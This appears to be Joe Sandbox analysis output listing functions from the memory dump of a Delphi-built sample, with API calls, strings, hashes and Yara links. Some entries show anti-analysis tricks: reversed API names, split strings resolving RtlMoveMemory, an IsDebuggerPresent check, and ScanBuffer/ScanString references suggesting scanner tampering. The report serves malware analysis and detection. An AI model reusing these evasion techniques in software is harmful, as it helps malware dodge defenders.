Associated: 00000000.00000002.1428011710.0000000002EDE000.00000004.00001000.00020000.00000000.sdmpDownload File
Associated: 00000000.00000002.1428011710.000000000302B000.00000004.00001000.00020000.00000000.sdmpDownload File
Associated: 00000000.00000002.1428011710.000000000302E000.00000004.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_2eb0000_1m181Ru74o.jbxd

Similarity

API ID: AddressProc$HandleModule
String ID: CoAddRefServerProcess$CoCreateInstanceEx$CoInitializeEx$CoReleaseServerProcess$CoResumeClassObjects$CoSuspendClassObjects$ole32.dll
API String ID: 667068680-2233174745
Opcode ID: 31f26636d306554fa591f288ff336f5b633c678e50e36d32a8074ffde08e9ac2
Instruction ID: 3416f6b4ac14894af4a3b60518e3376b32e2005ef046ca1d4828185e2afe50be
Opcode Fuzzy Hash: 31f26636d306554fa591f288ff336f5b633c678e50e36d32a8074ffde08e9ac2
Instruction Fuzzy Hash: 93F08CF0AC93826DFB017FB36E85867375DAE94608324FC1DB802AD586E67298514F11

Function 02EB2530 Relevance: 17.8, APIs: 1, Strings: 9, Instructions: 254windowCOMMON

Download Yara Rule

APIs

MessageBoxA.USER32(00000000,?,Unexpected Memory Leak,00002010), ref: 02EB28CE

Strings

An unexpected memory leak has occurred. , xrefs: 02EB2690
bytes: , xrefs: 02EB275D
Unknown, xrefs: 02EB278C
7, xrefs: 02EB26A1
The unexpected small block leaks are:, xrefs: 02EB2707
Unexpected Memory Leak, xrefs: 02EB28C0
The sizes of unexpected leaked medium and large blocks are: , xrefs: 02EB2849
, xrefs: 02EB2814
String, xrefs: 02EB27A1

Memory Dump Source

Source File: 00000000.00000002.1427879050.0000000002EB1000.00000020.00001000.00020000.00000000.sdmp, Offset: 02EB0000, based on PE: true

Associated: 00000000.00000002.1427857534.0000000002EB0000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 00000000.00000002.1428011710.0000000002EDE000.00000004.00001000.00020000.00000000.sdmpDownload File
Associated: 00000000.00000002.1428011710.000000000302B000.00000004.00001000.00020000.00000000.sdmpDownload File
Associated: 00000000.00000002.1428011710.000000000302E000.00000004.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_2eb0000_1m181Ru74o.jbxd

Similarity

API ID: Message
String ID: $ bytes: $7$An unexpected memory leak has occurred. $String$The sizes of unexpected leaked medium and large blocks are: $The unexpected small block leaks are:$Unexpected Memory Leak$Unknown
API String ID: 2030045667-32948583
Opcode ID: f4e2aa42982af0d44c45fa7b8ac2542fccd0da4b4ebe64828b150b8d5ce07153
Instruction ID: be1203d58bd8c94537b95bc8fb321852af6038bd2de860bd99683dbdcd8d99c0
Opcode Fuzzy Hash: f4e2aa42982af0d44c45fa7b8ac2542fccd0da4b4ebe64828b150b8d5ce07153
Instruction Fuzzy Hash: FAA10830A442648BDF23AA2CCC80BDA77E5EF09354F14A1E5EE49AB285CB758985CF51

Function 02EB252E Relevance: 14.2, APIs: 1, Strings: 7, Instructions: 188COMMON

Download Yara Rule

Strings

An unexpected memory leak has occurred. , xrefs: 02EB2690
bytes: , xrefs: 02EB275D
7, xrefs: 02EB26A1
The unexpected small block leaks are:, xrefs: 02EB2707
Unexpected Memory Leak, xrefs: 02EB28C0
The sizes of unexpected leaked medium and large blocks are: , xrefs: 02EB2849
, xrefs: 02EB2814

Memory Dump Source

Source File: 00000000.00000002.1427879050.0000000002EB1000.00000020.00001000.00020000.00000000.sdmp, Offset: 02EB0000, based on PE: true

Associated: 00000000.00000002.1427857534.0000000002EB0000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 00000000.00000002.1428011710.0000000002EDE000.00000004.00001000.00020000.00000000.sdmpDownload File
Associated: 00000000.00000002.1428011710.000000000302B000.00000004.00001000.00020000.00000000.sdmpDownload File
Associated: 00000000.00000002.1428011710.000000000302E000.00000004.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_2eb0000_1m181Ru74o.jbxd

Similarity

API ID:
String ID: $ bytes: $7$An unexpected memory leak has occurred. $The sizes of unexpected leaked medium and large blocks are: $The unexpected small block leaks are:$Unexpected Memory Leak
API String ID: 0-2723507874
Opcode ID: 3fbebc5f391cffb7cb1562a63a9c4da31b1f5473df24ef5de01e08a30b1d3efe
Instruction ID: 140c3c7386a19c82ef70afe4bebba356a7ab6c3f9166d621ebcee37abeaf4608
Opcode Fuzzy Hash: 3fbebc5f391cffb7cb1562a63a9c4da31b1f5473df24ef5de01e08a30b1d3efe
Instruction Fuzzy Hash: B671D730A442688FDF23AA2CCC84BDAB6E5EF09344F10A1E5EA4DDB285DB7549C5CF51

Function 02ECAFE4 Relevance: 14.1, APIs: 6, Strings: 2, Instructions: 102libraryCOMMON

Download Yara Rule

APIs

IsBadReadPtr.KERNEL32(?,00000004), ref: 02ECB004
GetModuleHandleW.KERNEL32(KernelBase,LoadLibraryExA,?,00000004,?,00000014), ref: 02ECB01B
LoadLibraryExA.KERNELBASE(?,00000000,00000000), ref: 02ECB033
IsBadReadPtr.KERNEL32(?,00000004), ref: 02ECB0AF
IsBadReadPtr.KERNEL32(?,00000002), ref: 02ECB0BB
IsBadReadPtr.KERNEL32(?,00000014), ref: 02ECB0CF

Strings

LoadLibraryExA, xrefs: 02ECB011
KernelBase, xrefs: 02ECB016

Memory Dump Source

Source File: 00000000.00000002.1427879050.0000000002EB1000.00000020.00001000.00020000.00000000.sdmp, Offset: 02EB0000, based on PE: true

Associated: 00000000.00000002.1427857534.0000000002EB0000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 00000000.00000002.1428011710.0000000002EDE000.00000004.00001000.00020000.00000000.sdmpDownload File
Associated: 00000000.00000002.1428011710.000000000302B000.00000004.00001000.00020000.00000000.sdmpDownload File
Associated: 00000000.00000002.1428011710.000000000302E000.00000004.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_2eb0000_1m181Ru74o.jbxd

Similarity

API ID: Read$HandleLibraryLoadModule
String ID: KernelBase$LoadLibraryExA
API String ID: 2872661360-113032527
Opcode ID: 54bdd16decc31adcd7517d55dd1e2b4ceb65cc613bcddc25641652828a96dcff
Instruction ID: 3c5cfe467405788c18e3fac8df628a130d80cafa0f8d55be0ab031be3bfaebbb
Opcode Fuzzy Hash: 54bdd16decc31adcd7517d55dd1e2b4ceb65cc613bcddc25641652828a96dcff
Instruction Fuzzy Hash: 2E3154B1680705FBDB21DBE4CE86F9A77A8BF0432CF14D518FA1497285D3709551CBA4

Function 02EBBDD0 Relevance: 12.5, APIs: 1, Strings: 6, Instructions: 201threadCOMMON

Download Yara Rule

APIs

GetThreadLocale.KERNEL32(00000000,02EBC09B,?,?,00000000,00000000), ref: 02EBBE06

Part of subcall function 02EBA7D4: GetLocaleInfoA.KERNEL32(?,?,?,00000100), ref: 02EBA7F2

Strings

:mm, xrefs: 02EBC039
m/d/yy, xrefs: 02EBBED5
mmmm d, yyyy, xrefs: 02EBBF02
:mm:ss, xrefs: 02EBC056
AMPM , xrefs: 02EBC029
AMPM, xrefs: 02EBC01A

Memory Dump Source

Source File: 00000000.00000002.1427879050.0000000002EB1000.00000020.00001000.00020000.00000000.sdmp, Offset: 02EB0000, based on PE: true

Associated: 00000000.00000002.1427857534.0000000002EB0000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 00000000.00000002.1428011710.0000000002EDE000.00000004.00001000.00020000.00000000.sdmpDownload File
Associated: 00000000.00000002.1428011710.000000000302B000.00000004.00001000.00020000.00000000.sdmpDownload File
Associated: 00000000.00000002.1428011710.000000000302E000.00000004.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_2eb0000_1m181Ru74o.jbxd

Similarity

API ID: Locale$InfoThread
String ID: AMPM$:mm$:mm:ss$AMPM $m/d/yy$mmmm d, yyyy
API String ID: 4232894706-2493093252
Opcode ID: 58a71c87fcec03d94a0a227e65f0fdc31c30b5f4cbb8cd64a91e8193631150a0
Instruction ID: fd0fe15f508895b1e7e26b3b6c32edfe5119023647b61cfa1500dbbacedff893
Opcode Fuzzy Hash: 58a71c87fcec03d94a0a227e65f0fdc31c30b5f4cbb8cd64a91e8193631150a0
Instruction Fuzzy Hash: CE613474B841485BDF02EBA4D8A0ADF77BB9F88300F60F435B101ABB45DA35D9059FA5

Function 02EB435C Relevance: 12.3, APIs: 5, Strings: 2, Instructions: 38filewindowCOMMON

Download Yara Rule

APIs

GetStdHandle.KERNEL32(000000F5,Runtime error at 00000000,0000001E,?,00000000,?,02EB4423,?,?,02F367C8,?,?,02EDE7A8,02EB65B1,02EDD30D), ref: 02EB4395
WriteFile.KERNEL32(00000000,000000F5,Runtime error at 00000000,0000001E,?,00000000,?,02EB4423,?,?,02F367C8,?,?,02EDE7A8,02EB65B1,02EDD30D), ref: 02EB439B
GetStdHandle.KERNEL32(000000F5,02EB43E4,00000002,?,00000000,00000000,000000F5,Runtime error at 00000000,0000001E,?,00000000,?,02EB4423,?,?,02F367C8), ref: 02EB43B0
WriteFile.KERNEL32(00000000,000000F5,02EB43E4,00000002,?,00000000,00000000,000000F5,Runtime error at 00000000,0000001E,?,00000000,?,02EB4423,?,?), ref: 02EB43B6
MessageBoxA.USER32(00000000,Runtime error at 00000000,Error,00000000), ref: 02EB43D4

Strings

Error, xrefs: 02EB43C8
Runtime error at 00000000, xrefs: 02EB438E, 02EB43CD

Memory Dump Source

Source File: 00000000.00000002.1427879050.0000000002EB1000.00000020.00001000.00020000.00000000.sdmp, Offset: 02EB0000, based on PE: true

Associated: 00000000.00000002.1427857534.0000000002EB0000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 00000000.00000002.1428011710.0000000002EDE000.00000004.00001000.00020000.00000000.sdmpDownload File
Associated: 00000000.00000002.1428011710.000000000302B000.00000004.00001000.00020000.00000000.sdmpDownload File
Associated: 00000000.00000002.1428011710.000000000302E000.00000004.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_2eb0000_1m181Ru74o.jbxd

Similarity

API ID: FileHandleWrite$Message
String ID: Error$Runtime error at 00000000
API String ID: 1570097196-2970929446
Opcode ID: 47c0aff1513c8f656a53134f4a2edd5733ee8ab8c806254a6830d6cb57476535
Instruction ID: 74e69f04daaf6a30f67ca637ede0beb6d37a11e437a9c549a58016da2fcbaf33
Opcode Fuzzy Hash: 47c0aff1513c8f656a53134f4a2edd5733ee8ab8c806254a6830d6cb57476535
Instruction Fuzzy Hash: B4F090A0AC434475F613A2A07C6AFDB775D5F44FA5F58EA05B324AC0C297A480C58B32

Function 02EBAED4 Relevance: 10.6, APIs: 7, Instructions: 56filewindowCOMMON

Download Yara Rule

APIs

Part of subcall function 02EBAD4C: VirtualQuery.KERNEL32(?,?,0000001C), ref: 02EBAD69
Part of subcall function 02EBAD4C: GetModuleFileNameA.KERNEL32(?,?,00000105), ref: 02EBAD8D
Part of subcall function 02EBAD4C: GetModuleFileNameA.KERNEL32(02EB0000,?,00000105), ref: 02EBADA8
Part of subcall function 02EBAD4C: LoadStringA.USER32(00000000,0000FFE9,?,00000100), ref: 02EBAE3E

CharToOemA.USER32(?,?), ref: 02EBAF0B
GetStdHandle.KERNEL32(000000F4,?,00000000,?,00000000,?,?), ref: 02EBAF28
WriteFile.KERNEL32(00000000,000000F4,?,00000000,?,00000000,?,?), ref: 02EBAF2E
GetStdHandle.KERNEL32(000000F4,02EBAF98,00000002,?,00000000,00000000,000000F4,?,00000000,?,00000000,?,?), ref: 02EBAF43
WriteFile.KERNEL32(00000000,000000F4,02EBAF98,00000002,?,00000000,00000000,000000F4,?,00000000,?,00000000,?,?), ref: 02EBAF49
LoadStringA.USER32(00000000,0000FFEA,?,00000040), ref: 02EBAF6B
MessageBoxA.USER32(00000000,?,?,00002010), ref: 02EBAF81

Memory Dump Source

Source File: 00000000.00000002.1427879050.0000000002EB1000.00000020.00001000.00020000.00000000.sdmp, Offset: 02EB0000, based on PE: true

Associated: 00000000.00000002.1427857534.0000000002EB0000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 00000000.00000002.1428011710.0000000002EDE000.00000004.00001000.00020000.00000000.sdmpDownload File
Associated: 00000000.00000002.1428011710.000000000302B000.00000004.00001000.00020000.00000000.sdmpDownload File
Associated: 00000000.00000002.1428011710.000000000302E000.00000004.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_2eb0000_1m181Ru74o.jbxd

Similarity

API ID: File$HandleLoadModuleNameStringWrite$CharMessageQueryVirtual
String ID:
API String ID: 185507032-0
Opcode ID: dc664060b5a61251a6e12e48314300e14ed966710d9c57312a2ea7393cb99274
Instruction ID: 0a0044cf4e523658b5251b8a1b37a1d38a2a408e49616934ce2aa3b66ae56d64
Opcode Fuzzy Hash: dc664060b5a61251a6e12e48314300e14ed966710d9c57312a2ea7393cb99274
Instruction Fuzzy Hash: C21170B2584204BFD602FBA4CC88FDBB7EEAF45700F809925B754DA1E0DB75D9408B62

Function 02EBE59C Relevance: 9.1, APIs: 6, Instructions: 139COMMON

Download Yara Rule

APIs

SafeArrayGetLBound.OLEAUT32(?,00000001,?), ref: 02EBE635
SafeArrayGetUBound.OLEAUT32(?,00000001,?), ref: 02EBE651
SafeArrayCreate.OLEAUT32(0000000C,?,?), ref: 02EBE68A
SafeArrayPtrOfIndex.OLEAUT32(?,?,?), ref: 02EBE707
SafeArrayPtrOfIndex.OLEAUT32(00000000,?,?), ref: 02EBE720
VariantCopy.OLEAUT32(?,00000000), ref: 02EBE755

Memory Dump Source

Source File: 00000000.00000002.1427879050.0000000002EB1000.00000020.00001000.00020000.00000000.sdmp, Offset: 02EB0000, based on PE: true

Associated: 00000000.00000002.1427857534.0000000002EB0000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 00000000.00000002.1428011710.0000000002EDE000.00000004.00001000.00020000.00000000.sdmpDownload File
Associated: 00000000.00000002.1428011710.000000000302B000.00000004.00001000.00020000.00000000.sdmpDownload File
Associated: 00000000.00000002.1428011710.000000000302E000.00000004.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_2eb0000_1m181Ru74o.jbxd

Similarity

API ID: ArraySafe$BoundIndex$CopyCreateVariant
String ID:
API String ID: 351091851-0
Opcode ID: a9a696700a5c398af6b49de9a61da99d4f96f00f59c5a2cf8b5ab96da2f16d4b
Instruction ID: f8adaed2e9c79708ad981637575ea2a05406bbab9931b4586c09e733d91b43a8
Opcode Fuzzy Hash: a9a696700a5c398af6b49de9a61da99d4f96f00f59c5a2cf8b5ab96da2f16d4b
Instruction Fuzzy Hash: B8510C759402299BCB27DB58CD80BDAB3BDAF09304F4895E5FA09E7211D634AF848F61

Function 02EB3598 Relevance: 8.8, APIs: 3, Strings: 2, Instructions: 49registryCOMMON

Download Yara Rule

APIs

RegOpenKeyExA.ADVAPI32(80000002,SOFTWARE\Borland\Delphi\RTL,00000000,00000001,?), ref: 02EB35BA
RegQueryValueExA.ADVAPI32(?,FPUMaskValue,00000000,00000000,?,00000004,00000000,02EB3609,?,80000002,SOFTWARE\Borland\Delphi\RTL,00000000,00000001,?), ref: 02EB35ED
RegCloseKey.ADVAPI32(?,02EB3610,00000000,?,00000004,00000000,02EB3609,?,80000002,SOFTWARE\Borland\Delphi\RTL,00000000,00000001,?), ref: 02EB3603

Strings

FPUMaskValue, xrefs: 02EB35E4
SOFTWARE\Borland\Delphi\RTL, xrefs: 02EB35B0

Memory Dump Source

Source File: 00000000.00000002.1427879050.0000000002EB1000.00000020.00001000.00020000.00000000.sdmp, Offset: 02EB0000, based on PE: true

Associated: 00000000.00000002.1427857534.0000000002EB0000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 00000000.00000002.1428011710.0000000002EDE000.00000004.00001000.00020000.00000000.sdmpDownload File
Associated: 00000000.00000002.1428011710.000000000302B000.00000004.00001000.00020000.00000000.sdmpDownload File
Associated: 00000000.00000002.1428011710.000000000302E000.00000004.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_2eb0000_1m181Ru74o.jbxd

Similarity

API ID: CloseOpenQueryValue
String ID: FPUMaskValue$SOFTWARE\Borland\Delphi\RTL
API String ID: 3677997916-4173385793
Opcode ID: 3afb02dae72bfedf7dc3b40cd0b43da97decf61b32e2c3b480784c916e65cf00
Instruction ID: 19cb137264a73e4d0b9ee91ba4e7a30084be3054a73518e5c80e6dc182819c7e
Opcode Fuzzy Hash: 3afb02dae72bfedf7dc3b40cd0b43da97decf61b32e2c3b480784c916e65cf00
Instruction Fuzzy Hash: E801F575DC0208BAEB12DBA09E03BFA73ECDF08B10F5044A1BA04DA680E274A910DA59

Function 02EC8284 Relevance: 8.8, APIs: 3, Strings: 2, Instructions: 44libraryloaderCOMMON

Download Yara Rule

APIs

GetModuleHandleW.KERNEL32(Kernel32,00000000,00000000,02EC830C,?,?,00000000,00000000,?,02EC8225,00000000,KernelBASE,00000000,00000000,02EC824C), ref: 02EC82D1
GetProcAddress.KERNEL32(00000000,Kernel32), ref: 02EC82D7
GetProcAddress.KERNEL32(?,?), ref: 02EC82E9

Strings

Kernel32, xrefs: 02EC82CC
sserddAcorPteG, xrefs: 02EC829F

Memory Dump Source

Source File: 00000000.00000002.1427879050.0000000002EB1000.00000020.00001000.00020000.00000000.sdmp, Offset: 02EB0000, based on PE: true

Associated: 00000000.00000002.1427857534.0000000002EB0000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 00000000.00000002.1428011710.0000000002EDE000.00000004.00001000.00020000.00000000.sdmpDownload File
Associated: 00000000.00000002.1428011710.000000000302B000.00000004.00001000.00020000.00000000.sdmpDownload File
Associated: 00000000.00000002.1428011710.000000000302E000.00000004.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_2eb0000_1m181Ru74o.jbxd

Similarity

API ID: AddressProc$HandleModule
String ID: Kernel32$sserddAcorPteG
API String ID: 667068680-1372893251
Opcode ID: e7e295b44a7faf405a55ef2b4411fbe4bb28dde949a41f3899b23ce49b99c72a
Instruction ID: 54ed5bbf507c0736e300c396119a85a8e694e0264ec6ed91605788d8a7d74b13
Opcode Fuzzy Hash: e7e295b44a7faf405a55ef2b4411fbe4bb28dde949a41f3899b23ce49b99c72a
Instruction Fuzzy Hash: 740162746C0308AFE706EBA8DD51E9FB7EEEF4DB00F61E464B800D7641D674A901CA24

Function 02EBAA60 Relevance: 7.6, APIs: 5, Instructions: 50threadCOMMON

Download Yara Rule

APIs

GetThreadLocale.KERNEL32(?,00000000,02EBAAF7,?,?,00000000), ref: 02EBAA78

Part of subcall function 02EBA7D4: GetLocaleInfoA.KERNEL32(?,?,?,00000100), ref: 02EBA7F2

GetThreadLocale.KERNEL32(00000000,00000004,00000000,02EBAAF7,?,?,00000000), ref: 02EBAAA8
EnumCalendarInfoA.KERNEL32(Function_0000A9AC,00000000,00000000,00000004), ref: 02EBAAB3
GetThreadLocale.KERNEL32(00000000,00000003,00000000,02EBAAF7,?,?,00000000), ref: 02EBAAD1
EnumCalendarInfoA.KERNEL32(Function_0000A9E8,00000000,00000000,00000003), ref: 02EBAADC

Memory Dump Source

Source File: 00000000.00000002.1427879050.0000000002EB1000.00000020.00001000.00020000.00000000.sdmp, Offset: 02EB0000, based on PE: true

Associated: 00000000.00000002.1427857534.0000000002EB0000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 00000000.00000002.1428011710.0000000002EDE000.00000004.00001000.00020000.00000000.sdmpDownload File
Associated: 00000000.00000002.1428011710.000000000302B000.00000004.00001000.00020000.00000000.sdmpDownload File
Associated: 00000000.00000002.1428011710.000000000302E000.00000004.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_2eb0000_1m181Ru74o.jbxd

Similarity

API ID: Locale$InfoThread$CalendarEnum
String ID:
API String ID: 4102113445-0
Opcode ID: f8b680cdc45230d3d9654d08d3ed94e69122cb31ed55172288c664fe14648aef
Instruction ID: f193f43884fd0fbfbffb8226b3e5a069dce5dff4f941b217730e4499a5874caf
Opcode Fuzzy Hash: f8b680cdc45230d3d9654d08d3ed94e69122cb31ed55172288c664fe14648aef
Instruction Fuzzy Hash: 1101D4712C0204AAFE13A774DC12BDB735DDF86710F61E531F400E6B84E6659D008A64

Function 02EBAB10 Relevance: 7.1, APIs: 1, Strings: 3, Instructions: 148threadCOMMON

Download Yara Rule

APIs

GetThreadLocale.KERNEL32(?,00000000,02EBACE0,?,?,?,?,00000000,00000000,00000000,00000000,00000000), ref: 02EBAB3F

Part of subcall function 02EBA7D4: GetLocaleInfoA.KERNEL32(?,?,?,00000100), ref: 02EBA7F2

Strings

ggg, xrefs: 02EBAC25
yyyy, xrefs: 02EBAC35
eeee, xrefs: 02EBAC4E

Memory Dump Source

Source File: 00000000.00000002.1427879050.0000000002EB1000.00000020.00001000.00020000.00000000.sdmp, Offset: 02EB0000, based on PE: true

Associated: 00000000.00000002.1427857534.0000000002EB0000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 00000000.00000002.1428011710.0000000002EDE000.00000004.00001000.00020000.00000000.sdmpDownload File
Associated: 00000000.00000002.1428011710.000000000302B000.00000004.00001000.00020000.00000000.sdmpDownload File
Associated: 00000000.00000002.1428011710.000000000302E000.00000004.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_2eb0000_1m181Ru74o.jbxd

Similarity

API ID: Locale$InfoThread
String ID: eeee$ggg$yyyy
API String ID: 4232894706-1253427255
Opcode ID: ca3cb66f0ae78ce08bc1c0cc62cd3035e52108d0d9f4155207b54d1818588b24
Instruction ID: 4032d2a72d3d9fd6e71e9860ee85891b6876bd99f9d316d602ca7ee79311fb13
Opcode Fuzzy Hash: ca3cb66f0ae78ce08bc1c0cc62cd3035e52108d0d9f4155207b54d1818588b24
Instruction Fuzzy Hash: 1341CD707C41184BDE13EB6888A06FFB3EBDF82205B64E575B452C2785EA359D01CEA1

Function 02EC7E60 Relevance: 7.1, APIs: 1, Strings: 3, Instructions: 53COMMON

Download Yara Rule

APIs

Part of subcall function 02EC81DC: GetModuleHandleA.KERNEL32(KernelBASE,00000000,00000000,02EC824C,?,?,00000000,?,02EC7A8E,ntdll,00000000,00000000,02EC7AD3,?,?,00000000), ref: 02EC821A
Part of subcall function 02EC81DC: GetModuleHandleA.KERNELBASE(?), ref: 02EC822E

Part of subcall function 02EC8284: GetModuleHandleW.KERNEL32(Kernel32,00000000,00000000,02EC830C,?,?,00000000,00000000,?,02EC8225,00000000,KernelBASE,00000000,00000000,02EC824C), ref: 02EC82D1
Part of subcall function 02EC8284: GetProcAddress.KERNEL32(00000000,Kernel32), ref: 02EC82D7
Part of subcall function 02EC8284: GetProcAddress.KERNEL32(?,?), ref: 02EC82E9

RtlMoveMemory.NTDLL(?,?,?), ref: 02EC7EE7

Strings

RtlM, xrefs: 02EC7E82
Ntdll, xrefs: 02EC7EC6
oveM, xrefs: 02EC7E78

Memory Dump Source

Source File: 00000000.00000002.1427879050.0000000002EB1000.00000020.00001000.00020000.00000000.sdmp, Offset: 02EB0000, based on PE: true

Associated: 00000000.00000002.1427857534.0000000002EB0000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 00000000.00000002.1428011710.0000000002EDE000.00000004.00001000.00020000.00000000.sdmpDownload File
Associated: 00000000.00000002.1428011710.000000000302B000.00000004.00001000.00020000.00000000.sdmpDownload File
Associated: 00000000.00000002.1428011710.000000000302E000.00000004.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_2eb0000_1m181Ru74o.jbxd

Similarity

API ID: HandleModule$AddressProc$MemoryMove
String ID: Ntdll$RtlM$oveM
API String ID: 2705147948-1610840992
Opcode ID: 24beeab58da9ed1b9f05b2f2163cddd8a203cdd9429e6fe8e4f1362b2b0efcb2
Instruction ID: 45059397fc7f192e748ea9352288f72e25c1f137d010768a02c445a9127eb60a
Opcode Fuzzy Hash: 24beeab58da9ed1b9f05b2f2163cddd8a203cdd9429e6fe8e4f1362b2b0efcb2
Instruction Fuzzy Hash: 970171706C42887FFB42EBD6DE52F9AF7DDEB08B00F60A468B905D2680C67499118E64

Function 02EC81DC Relevance: 7.0, APIs: 2, Strings: 2, Instructions: 36COMMON

Download Yara Rule

APIs

GetModuleHandleA.KERNEL32(KernelBASE,00000000,00000000,02EC824C,?,?,00000000,?,02EC7A8E,ntdll,00000000,00000000,02EC7AD3,?,?,00000000), ref: 02EC821A

Part of subcall function 02EC8284: GetModuleHandleW.KERNEL32(Kernel32,00000000,00000000,02EC830C,?,?,00000000,00000000,?,02EC8225,00000000,KernelBASE,00000000,00000000,02EC824C), ref: 02EC82D1
Part of subcall function 02EC8284: GetProcAddress.KERNEL32(00000000,Kernel32), ref: 02EC82D7
Part of subcall function 02EC8284: GetProcAddress.KERNEL32(?,?), ref: 02EC82E9

GetModuleHandleA.KERNELBASE(?), ref: 02EC822E

Strings

KernelBASE, xrefs: 02EC8215
AeldnaHeludoMteG, xrefs: 02EC81F5

Memory Dump Source

Source File: 00000000.00000002.1427879050.0000000002EB1000.00000020.00001000.00020000.00000000.sdmp, Offset: 02EB0000, based on PE: true

Associated: 00000000.00000002.1427857534.0000000002EB0000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 00000000.00000002.1428011710.0000000002EDE000.00000004.00001000.00020000.00000000.sdmpDownload File
Associated: 00000000.00000002.1428011710.000000000302B000.00000004.00001000.00020000.00000000.sdmpDownload File
Associated: 00000000.00000002.1428011710.000000000302E000.00000004.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_2eb0000_1m181Ru74o.jbxd

Similarity

API ID: HandleModule$AddressProc
String ID: AeldnaHeludoMteG$KernelBASE
API String ID: 1883125708-1952140341
Opcode ID: 0dfc26345ebdd37283ca1b563484e9fd514ad79a4a4ceb5ef3c75484d496fe93
Instruction ID: 7152073aa30e0b0b02128d1416633e5ac72f1811ea6f67afa9a159142ef45156
Opcode Fuzzy Hash: 0dfc26345ebdd37283ca1b563484e9fd514ad79a4a4ceb5ef3c75484d496fe93
Instruction Fuzzy Hash: 46F0CDB0AC0708AFE707FBF4DE5595FB7EEEB49700761E864B80483604D630AD108A24

Function 02ECF6EC Relevance: 7.0, APIs: 2, Strings: 2, Instructions: 19libraryloaderCOMMON

Download Yara Rule

APIs

GetModuleHandleW.KERNEL32(KernelBase,?,02ECFAEF,UacInitialize,02F37380,02EDB7BC,OpenSession,02F37380,02EDB7BC,ScanBuffer,02F37380,02EDB7BC,ScanString,02F37380,02EDB7BC,Initialize), ref: 02ECF6F2
GetProcAddress.KERNEL32(00000000,IsDebuggerPresent), ref: 02ECF704

Strings

KernelBase, xrefs: 02ECF6ED
IsDebuggerPresent, xrefs: 02ECF6FE

Memory Dump Source

Source File: 00000000.00000002.1427879050.0000000002EB1000.00000020.00001000.00020000.00000000.sdmp, Offset: 02EB0000, based on PE: true

Associated: 00000000.00000002.1427857534.0000000002EB0000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 00000000.00000002.1428011710.0000000002EDE000.00000004.00001000.00020000.00000000.sdmpDownload File
Associated: 00000000.00000002.1428011710.000000000302B000.00000004.00001000.00020000.00000000.sdmpDownload File
Associated: 00000000.00000002.1428011710.000000000302E000.00000004.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_2eb0000_1m181Ru74o.jbxd

Similarity

API ID: AddressHandleModuleProc
String ID: IsDebuggerPresent$KernelBase
API String ID: 1646373207-2367923768
Opcode ID: 3a7eff0353c568fa84cef9d1a365df321ac6d1a0aa1d51ffb6ce46f94cb0ad74
Instruction ID: 7c986efa2a77ddca08e3b9e80d6eb0989550297e930efae83dcce7c95b4aeea2
Opcode Fuzzy Hash: 3a7eff0353c568fa84cef9d1a365df321ac6d1a0aa1d51ffb6ce46f94cb0ad74
Instruction Fuzzy Hash: 57D012A23E134019F90477F41DC485A034E891852D330FE36B026D55D2F676882B5011

Function 02EBC484 Relevance: 7.0, APIs: 2, Strings: 2, Instructions: 16libraryloaderCOMMON

Download Yara Rule

APIs

GetModuleHandleA.KERNEL32(kernel32.dll,?,02EDD10B,00000000,02EDD11E), ref: 02EBC48A
GetProcAddress.KERNEL32(00000000,GetDiskFreeSpaceExA), ref: 02EBC49B

Strings

kernel32.dll, xrefs: 02EBC485
GetDiskFreeSpaceExA, xrefs: 02EBC495

Memory Dump Source

Source File: 00000000.00000002.1427879050.0000000002EB1000.00000020.00001000.00020000.00000000.sdmp, Offset: 02EB0000, based on PE: true

Associated: 00000000.00000002.1427857534.0000000002EB0000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 00000000.00000002.1428011710.0000000002EDE000.00000004.00001000.00020000.00000000.sdmpDownload File
Associated: 00000000.00000002.1428011710.000000000302B000.00000004.00001000.00020000.00000000.sdmpDownload File
Associated: 00000000.00000002.1428011710.000000000302E000.00000004.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_2eb0000_1m181Ru74o.jbxd

Similarity

API ID: AddressHandleModuleProc
String ID: GetDiskFreeSpaceExA$kernel32.dll
API String ID: 1646373207-3712701948
Opcode ID: ac33a90e4ade1ec82d8a7d1ee1cfe8846d9cfcf1aa6f51aa5ff8ab2cae345854
